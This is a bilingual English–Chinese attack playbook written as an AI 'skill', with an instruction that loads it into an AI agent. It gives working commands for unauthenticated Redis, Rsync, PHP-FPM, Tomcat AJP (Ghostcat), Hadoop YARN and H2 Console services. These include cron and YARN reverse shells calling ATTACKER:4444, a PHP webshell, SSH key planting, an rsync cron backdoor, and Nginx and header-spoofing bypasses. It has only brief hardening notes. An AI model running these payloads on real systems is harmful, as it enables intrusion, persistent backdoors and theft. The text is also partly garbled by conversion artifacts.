unauthorized-access-common-services

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: Unauthorized Access to Common Services — Expert Attack Playbook

SKILL: 常见服务未授权访问——专家攻击手册

AI LOAD INSTRUCTION: Expert techniques for exploiting unauthenticated or weakly authenticated management services. Covers Redis write-to-RCE, Rsync data theft, PHP-FPM code execution, Ghostcat AJP file read, Hadoop YARN job submission, and H2 Console JNDI. These are infrastructure-level findings distinct from web application vulnerabilities.

AI加载说明：针对未认证或弱认证管理服务的专家级利用技术，涵盖Redis写入到RCE、Rsync数据窃取、PHP-FPM代码执行、Ghostcat AJP文件读取、Hadoop YARN任务提交以及H2 Console JNDI注入。这些属于基础设施层面的问题，与Web应用漏洞不属于同一类别。

0. RELATED ROUTING

0. 关联技能路由

ssrf-server-side-request-forgery when these services are reachable via SSRF (e.g., SSRF → Redis)
jndi-injection when H2 Console or similar accepts JNDI connection strings
deserialization-insecure when RMI Registry or T3 protocol is exposed

当这些服务可通过SSRF访问时（例如SSRF → Redis），参考ssrf-server-side-request-forgery
当H2 Console或类似服务接受JNDI连接字符串时，参考jndi-injection
当RMI Registry或T3协议暴露时，参考deserialization-insecure

1. DISCOVERY — PORT SCANNING

1. 资产发现——端口扫描

bash

nmap -sV -p 6379,873,9000,8009,8088,8082,1099,9200,5984,2375,27017,11211 TARGET

bash

nmap -sV -p 6379,873,9000,8009,8088,8082,1099,9200,5984,2375,27017,11211 TARGET

Key ports:

关键端口说明:

6379 — Redis

873 — Rsync

9000 — PHP-FPM (FastCGI)

8009 — AJP (Tomcat Ghostcat)

8088 — Hadoop YARN ResourceManager

8082 — H2 Console (or embedded in Spring Boot)

8082 — H2 Console (或内嵌于Spring Boot中)

1099 — Java RMI Registry

9200 — Elasticsearch

5984 — CouchDB

2375 — Docker API

27017 — MongoDB

11211 — Memcached

---

---

2. REDIS (PORT 6379)

2. REDIS (端口6379)

Detection

漏洞检测

bash

redis-cli -h TARGET ping

bash

redis-cli -h TARGET ping

Response: PONG = unauthenticated access confirmed

响应: PONG = 确认存在未授权访问

redis-cli -h TARGET INFO server

Returns Redis version, OS, config

返回Redis版本、操作系统、配置信息

undefined

undefined

Write SSH Authorized Keys

写入SSH公钥实现免密登录

bash

undefined

bash

undefined

Generate key pair:

生成密钥对:

ssh-keygen -t rsa -f redis_rsa

Write public key to Redis, then dump to authorized_keys:

将公钥写入Redis，然后导出到authorized_keys文件:

redis-cli -h TARGET flushall cat redis_rsa.pub | redis-cli -h TARGET -x set ssh_key redis-cli -h TARGET config set dir /root/.ssh redis-cli -h TARGET config set dbfilename authorized_keys redis-cli -h TARGET save

Connect:

连接目标服务器:

ssh -i redis_rsa root@TARGET

undefined

ssh -i redis_rsa root@TARGET

undefined

Write Crontab (Reverse Shell)

写入定时任务获取反弹Shell

bash

redis-cli -h TARGET
> set x "\n\n*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1\n\n"
> config set dir /var/spool/cron/
> config set dbfilename root
> save

bash

redis-cli -h TARGET
> set x "\n\n*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1\n\n"
> config set dir /var/spool/cron/
> config set dbfilename root
> save

Write Webshell

写入Webshell

bash

redis-cli -h TARGET
> set webshell "<?php system($_GET['cmd']); ?>"
> config set dir /var/www/html/
> config set dbfilename shell.php
> save

bash

redis-cli -h TARGET
> set webshell "<?php system($_GET['cmd']); ?>"
> config set dir /var/www/html/
> config set dbfilename shell.php
> save

Access: http://TARGET/shell.php?cmd=id

访问地址: http://TARGET/shell.php?cmd=id

undefined

undefined

Master-Slave Replication RCE

主从复制RCE

Use

redis-rogue-server

to exploit master-slave replication for loading malicious

.so

module:

bash

python3 redis-rogue-server.py --rhost TARGET --lhost ATTACKER

使用

redis-rogue-server

利用主从复制机制加载恶意

.so

模块:

bash

python3 redis-rogue-server.py --rhost TARGET --lhost ATTACKER

Loads module via SLAVEOF → MODULE LOAD → system.exec

通过SLAVEOF → MODULE LOAD → system.exec流程加载模块执行命令

undefined

undefined

Hardening

安全加固

requirepass STRONG_PASSWORD
bind 127.0.0.1
protected-mode yes
rename-command CONFIG ""
rename-command FLUSHALL ""

requirepass STRONG_PASSWORD
bind 127.0.0.1
protected-mode yes
rename-command CONFIG ""
rename-command FLUSHALL ""

3. RSYNC (PORT 873)

3. RSYNC (端口873)

Detection

漏洞检测

bash

rsync TARGET::

bash

rsync TARGET::

Lists available modules (shares) if anonymous access allowed

如果允许匿名访问，会列出可用模块（共享目录）

rsync -av TARGET::MODULE_NAME /tmp/loot/

Download entire module contents

下载整个模块的全部内容

undefined

undefined

Exploitation — Write Crontab

漏洞利用——写入定时任务

bash

undefined

bash

undefined

Create reverse shell cron:

创建反弹Shell定时任务:

echo '*/1 * * * * bash -i >& /dev/tcp/ATTACKER/4444 0>&1' > /tmp/evil_cron

Upload to target's crontab (if writable module maps to /etc/ or similar):

上传到目标的定时任务目录（如果可写模块映射到/etc/等目录）:

rsync -av /tmp/evil_cron TARGET::MODULE/cron.d/backdoor

undefined

rsync -av /tmp/evil_cron TARGET::MODULE/cron.d/backdoor

undefined

Hardening

安全加固

undefined

undefined

/etc/rsyncd.conf:

/etc/rsyncd.conf配置:

auth users = rsync_user secrets file = /etc/rsyncd.secrets list = no hosts allow = 10.0.0.0/8 read only = yes

---

auth users = rsync_user secrets file = /etc/rsyncd.secrets list = no hosts allow = 10.0.0.0/8 read only = yes

---

4. PHP-FPM / FASTCGI (PORT 9000)

4. PHP-FPM / FASTCGI (端口9000)

Mechanism

漏洞原理

PHP-FPM listens for FastCGI requests. If exposed to the network (instead of Unix socket), an attacker can send crafted FastCGI packets to execute arbitrary PHP code.

PHP-FPM监听FastCGI请求，如果直接暴露在公网而非使用Unix套接字，攻击者可以发送构造的FastCGI数据包执行任意PHP代码。

Exploitation

漏洞利用

bash

undefined

bash

undefined

Using fcgi_exp or similar tool:

使用fcgi_exp或类似工具:

python3 fpm.py TARGET 9000 /var/www/html/index.php -c "<?php system('id'); ?>"

Key parameters in FastCGI request:

FastCGI请求关键参数:

SCRIPT_FILENAME = path to any existing .php file

SCRIPT_FILENAME = 任意存在的.php文件路径

PHP_VALUE = "auto_prepend_file = php://input" (injects POST body as PHP code)

PHP_VALUE = "auto_prepend_file = php://input" (将POST请求体作为PHP代码注入)

PHP_ADMIN_VALUE = "allow_url_include = On"

undefined

undefined

Key FastCGI Environment Variables for Exploitation

用于漏洞利用的关键FastCGI环境变量

text

SCRIPT_FILENAME = /var/www/html/index.php   # must point to an existing .php file
PHP_VALUE = auto_prepend_file = php://input  # injects POST body as PHP code
PHP_ADMIN_VALUE = allow_url_include = On     # enables remote inclusion

text

SCRIPT_FILENAME = /var/www/html/index.php   # 必须指向已存在的.php文件
PHP_VALUE = auto_prepend_file = php://input  # 将POST请求体作为PHP代码注入
PHP_ADMIN_VALUE = allow_url_include = On     # 开启远程包含

Via SSRF (gopher)

通过SSRF利用(gopher协议)

gopher://TARGET:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00...

gopher://TARGET:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00...

Encoded FastCGI packet

编码后的FastCGI数据包

Tool: Gopherus generates the gopher:// URL

工具: Gopherus可生成gopher://格式的URL

python3 gopherus.py --exploit fastcgi

undefined

python3 gopherus.py --exploit fastcgi

undefined

Hardening

安全加固

ini

; php-fpm.conf — bind to socket only:
listen = /var/run/php-fpm.sock
; If TCP required, restrict:
listen.allowed_clients = 127.0.0.1

ini

; php-fpm.conf — 仅绑定本地套接字:
listen = /var/run/php-fpm.sock
; 如果必须使用TCP，做访问限制:
listen.allowed_clients = 127.0.0.1

5. GHOSTCAT — AJP (PORT 8009) — CVE-2020-1938

5. GHOSTCAT — AJP (端口8009) — CVE-2020-1938

Mechanism

漏洞原理

Apache JServ Protocol (AJP) is used between reverse proxy and Tomcat. AJP trusts all incoming data — an attacker connecting directly can set

javax.servlet.include.request_uri

to read arbitrary files from the webapp directory.

Apache JServ Protocol (AJP)用于反向代理和Tomcat之间的通信，AJP默认信任所有传入数据，攻击者直接连接后可以设置

javax.servlet.include.request_uri

读取Web应用目录下的任意文件。

File Read

文件读取

bash

undefined

bash

undefined

Using ajpShooter or similar:

使用ajpShooter或类似工具:

python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

Reads any file within the webapp root:

可以读取Web应用根目录下的任意文件:

/WEB-INF/web.xml — deployment descriptor

/WEB-INF/web.xml — 部署描述符

/WEB-INF/classes/*.class — compiled Java classes

/WEB-INF/classes/*.class — 编译后的Java类文件

/WEB-INF/lib/*.jar — library JARs

/WEB-INF/lib/*.jar — 依赖库JAR包

undefined

undefined

File Include → RCE

文件包含 → RCE

If a file upload exists (e.g., uploaded JSP disguised as image), AJP can include it as JSP:

bash

python3 ajpShooter.py TARGET 8009 /uploaded_avatar.txt eval

如果存在文件上传功能（例如上传的JSP伪装为图片），AJP可以将其作为JSP文件包含执行:

bash

python3 ajpShooter.py TARGET 8009 /uploaded_avatar.txt eval

If the file contains JSP code, it gets executed

如果文件包含JSP代码，就会被执行

undefined

undefined

Hardening

安全加固

xml

<!-- server.xml — disable AJP or add secret: -->
<Connector port="8009" protocol="AJP/1.3" secretRequired="true" secret="STRONG_SECRET"/>
<!-- Or remove the AJP connector entirely -->

xml

<!-- server.xml — 禁用AJP或添加密钥校验: -->
<Connector port="8009" protocol="AJP/1.3" secretRequired="true" secret="STRONG_SECRET"/>
<!-- 或者直接删除AJP连接器配置 -->

6. HADOOP YARN RESOURCEMANAGER (PORT 8088)

6. HADOOP YARN RESOURCEMANAGER (端口8088)

Detection

漏洞检测

bash

curl http://TARGET:8088/cluster

bash

curl http://TARGET:8088/cluster

If accessible → unauthenticated YARN ResourceManager UI

如果可以正常访问 → 存在未授权的YARN ResourceManager UI

undefined

undefined

RCE via Application Submission

通过提交应用实现RCE

bash

undefined

bash

undefined

Submit a MapReduce application that executes a command:

提交执行命令的MapReduce应用:

curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application

Returns: {"application-id":"application_xxx_0001"}

返回: {"application-id":"application_xxx_0001"}

curl -s -X POST http://TARGET:8088/ws/v1/cluster/apps
-H "Content-Type: application/json"
-d '{ "application-id": "application_xxx_0001", "application-name": "test", "am-container-spec": { "commands": {"command": "/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1"} }, "application-type": "YARN" }'

undefined

undefined

Hardening

安全加固

Enable Kerberos authentication; restrict network access to management ports.

开启Kerberos认证；限制管理端口的网络访问权限。

7. H2 DATABASE CONSOLE

Detection

漏洞检测

H2 Console is often enabled in Spring Boot apps via:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

Access:

http://TARGET:PORT/h2-console

H2 Console通常在Spring Boot应用中通过以下配置开启:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

访问地址:

http://TARGET:PORT/h2-console

JNDI Injection via Connection String

通过连接字符串实现JNDI注入

In the H2 Console login form, the JDBC URL field accepts JNDI.

BeanFactory + EL bypass (works on Java 8u252+):

text

undefined

在H2 Console登录表单中，JDBC URL字段接受JNDI地址。

BeanFactory + EL绕过 (适用于Java 8u252+版本):

text

undefined

JDBC URL in login form:

登录表单中的JDBC URL:

javax.naming.InitialContext

LDAP response attributes:

LDAP响应属性:

javaClassName: javax.el.ELProcessor javaFactory: org.apache.naming.factory.BeanFactory forceString: x=eval x: Runtime.getRuntime().exec("id")


Also see [jndi-injection](../jndi-injection/SKILL.md) for the full JNDI/BeanFactory exploitation flow.

javaClassName: javax.el.ELProcessor javaFactory: org.apache.naming.factory.BeanFactory forceString: x=eval x: Runtime.getRuntime().exec("id")


完整的JNDI/BeanFactory利用流程参考[jndi-injection](../jndi-injection/SKILL.md)。

RCE via RUNSCRIPT

通过RUNSCRIPT实现RCE

sql

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd); return "ok"; }';
CALL EXEC('id');

sql

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd); return "ok"; }';
CALL EXEC('id');

8. QUICK REFERENCE

8. 快速参考

text

undefined

text

undefined

Redis — check auth:

Redis — 检查认证:

redis-cli -h TARGET ping

Redis — write webshell:

Redis — 写入webshell:

SET x "<?php system($_GET['c']);?>" CONFIG SET dir /var/www/html/ CONFIG SET dbfilename shell.php SAVE

Rsync — list modules:

Rsync — 列出模块:

rsync TARGET::

Ghostcat — read web.xml:

Ghostcat — 读取web.xml:

python3 ajpShooter.py TARGET 8009 /WEB-INF/web.xml read

YARN — submit RCE job:

YARN — 提交RCE任务:

curl -X POST http://TARGET:8088/ws/v1/cluster/apps/new-application

H2 — RCE via alias:

H2 — 通过自定义别名实现RCE:

CREATE ALIAS EXEC AS '...Runtime.exec...'; CALL EXEC('id');

---

CREATE ALIAS EXEC AS '...Runtime.exec...'; CALL EXEC('id');

---

9. REVERSE PROXY MISCONFIGURATION

9. 反向代理配置错误

Nginx Off-By-Slash Path Traversal

Nginx斜杠缺失路径穿越

nginx

undefined

nginx

undefined

Vulnerable configuration:

存在漏洞的配置:

location /static { alias /var/www/static/; }

Access: /static../etc/passwd → resolves to /var/www/etc/passwd

访问: /static../etc/passwd → 解析为/var/www/etc/passwd

The missing trailing slash on location causes path traversal

location末尾缺失斜杠会导致路径穿越漏洞

Fix: location /static/ (with trailing slash matching alias)

修复: location /static/ (末尾斜杠和alias配置匹配)

undefined

undefined

Nginx Missing Root Location

Nginx缺失根路径配置

nginx

undefined

nginx

undefined

If no root location defined and alias is used:

如果没有定义root位置且使用了alias配置:

Attacker may access nginx.conf or other server files

攻击者可以访问nginx.conf或其他服务器文件

GET /..%2f..%2fetc/nginx/nginx.conf HTTP/1.1

undefined

GET /..%2f..%2fetc/nginx/nginx.conf HTTP/1.1

undefined

X-Forwarded-For / X-Real-IP Trust

X-Forwarded-For / X-Real-IP信任绕过

undefined

undefined

If backend trusts these headers for IP-based auth:

如果后端信任这些头用于IP身份认证:

GET /admin HTTP/1.1 X-Forwarded-For: 127.0.0.1 X-Real-IP: 127.0.0.1 True-Client-IP: 127.0.0.1

May bypass IP whitelist for admin panels

可以绕过管理后台的IP白名单限制

undefined

undefined

Caddy Template Injection

Caddy模板注入

undefined

undefined

Caddy with templates enabled:

Caddy开启模板功能的场景:

If user input reaches Caddy template rendering:

如果用户输入可以进入Caddy模板渲染流程:

{{.Req.Host}} → Information disclosure {{readFile "/etc/passwd"}} → Local file read via Go template

{{.Req.Host}} → 信息泄露 {{readFile "/etc/passwd"}} → 通过Go模板读取本地文件

This is essentially a Go template injection through proxy config

本质是通过代理配置导致的Go模板注入漏洞

undefined

undefined

Useful Tools

常用工具

```
yandex/gixy
```
— Nginx configuration analyzer
```
Raelize/Kyubi
```
— Reverse proxy misconfiguration scanner
```
GerbenJavado/bypass-url-parser
```
— URL parser confusion tester

```
yandex/gixy
```
— Nginx配置分析工具
```
Raelize/Kyubi
```
— 反向代理配置错误扫描工具
```
GerbenJavado/bypass-url-parser
```
— URL解析混淆测试工具